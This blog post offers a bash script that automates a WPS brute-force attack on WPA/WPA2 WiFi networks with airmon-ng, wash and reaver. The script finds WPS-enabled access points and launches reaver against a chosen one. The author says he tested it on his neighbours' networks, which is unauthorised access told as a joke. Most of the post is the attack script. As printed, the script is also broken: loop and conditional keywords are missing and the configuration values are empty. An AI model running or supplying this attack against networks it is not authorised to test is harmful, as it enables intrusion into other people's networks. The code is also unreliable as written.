Shell script to attack a WPA/WPA2 network [Based on reaver and aircrack-ng]

I’ve spent the past few days playing around with the command line, and that is not something I do very often. It all began when I discovered this handy tool called Reaver which exploits vulnerabilities of the WPS standard. Naturally, I had to test it out on the numerous WPS-enabled wireless networks around me: I must say I have very, err, co-operative [and oblivious] neighbours!

I had previously tried in vain to learn to use the aircrack-ng suite of WiFi hacking. Since reaver is based on aircrack-ng, I had no choice but to give it another shot. This time, however, things made more sense, and I managed to use reaver successfully.

I made a small configurable shell script that will hopefully make the command line options seem a little less intimidating to the newcomer.

It’s the first shell script I’ve posted on the Internet, so it’s bound to be inefficient and just plain wrong in many ways, but if you leave a comment, I will definitely pay attention and tweak it. I also plan to include results from airodump-ng which provides a very neat set of information about access point power and frequency of beacons, which can help in choosing the best of the available access points.

#! /bin/bash

#WiFi Attack Script, v1.0
#Author: Vinay Gopinath
#Date: 26 October, 2012

#CONFIG: Customize the script according to your needs
#The default wireless interface (usually wlan0, wifi0 or ath0)

#The timeout (in seconds) for wash to search for WPS-enabled access points

#Flag to allow user to choose target AP

#Delay between attack attempts

#Check for root privileges
if (( EUID != 0 )); then
  echo "This script needs root"
  exit 1

#Check for required commands
for command in airmon-ng wash reaver
  if [[ -z $(which $command) ]]; then
     echo "$command was not found"
     echo "To install $command, you may follow this link"
     echo "$command+installation"
     exit 1

echo "WARNING: Network connections are about to go down. You may need to re-enable wireless connections manually"

#Check available interfaces and close previous monitor interfaces and wireless lan
for interface in $(ifconfig | tr -s [:space:] | cut -f1 -d" " | tr -s [:space:])
  if [[ -n $(echo $interface | grep "^mon*") ]] || [[ -n $(echo $interface | grep '0$') ]] && [[ $(echo $interface) != "eth0" ]]; then
    echo "* Shutting down $interface"
    airmon-ng stop $interface > /dev/null

echo "* Starting a new monitor interface mon0"
airmon-ng start $wireless_interface > /dev/null

echo "Identifying WPS-enabled access points"
timeout $wash_timeout wash -i mon0 --ignore-fcs > washOutput.txt
APs=$(cat washOutput.txt | tail -n +3 | tr -s ' ' | cut -f6 -d' ')

if [[ -n $(echo $APs) ]]; then
   if  (( $allow_user_choice )); then
      echo "The following access points were detected"
      for ap in $APs
        echo "* $n: $ap"
      read -p "Enter your choice: " choice
      if [[ $choice -le $n ]]; then
        chosen_ap=$(echo "${APs}" | head -$choice | tail -1)
	echo "You have chosen $chosen_ap"
	echo "Invalid choice!"
	exit 1
      chosen_ap=$(echo "${APs}" | head -n1)
      echo "Proceeding with choice 1: $chosen_ap"
   tempLine=$(cat washOutput.txt | grep $chosen_ap | tr -s ' ')
   rm washOutput.txt
   channel=$(echo $tempLine | cut -f2 -d' ')
   mac_address=$(echo $tempLine | cut -f1 -d' ')
   echo "Starting reaver"
   echo "reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay"
   echo "AP name: $chosen_ap"
   echo "Channel: $channel"
   echo "MAC Address: $mac_address"
   reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay
   echo "No networks found. Consider increasing the wash timeout. Terminating"
   exit 1

This shell script is also available here


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s